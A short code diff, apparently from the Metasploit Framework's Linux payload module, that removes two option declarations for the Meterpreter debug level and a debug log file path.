@@ -81,20 +81,6 @@ module Msf::Payload::Linux
             "false"
           ]
         ),
-        Msf::OptInt.new('MeterpreterDebugLevel',
-          [
-            true,
-            "Set debug level for meterpreter 0-3 (Default output is strerr)",
-            0
-          ]
-        ),
-        Msf::OptString.new('RemoteMeterpreterDebugFile',
-          [
-            false,
-            "Redirect Debug Info to a Log File",
-            ""
-          ]
-        ),
       ], Msf::Payload::Linux)
 
     ret
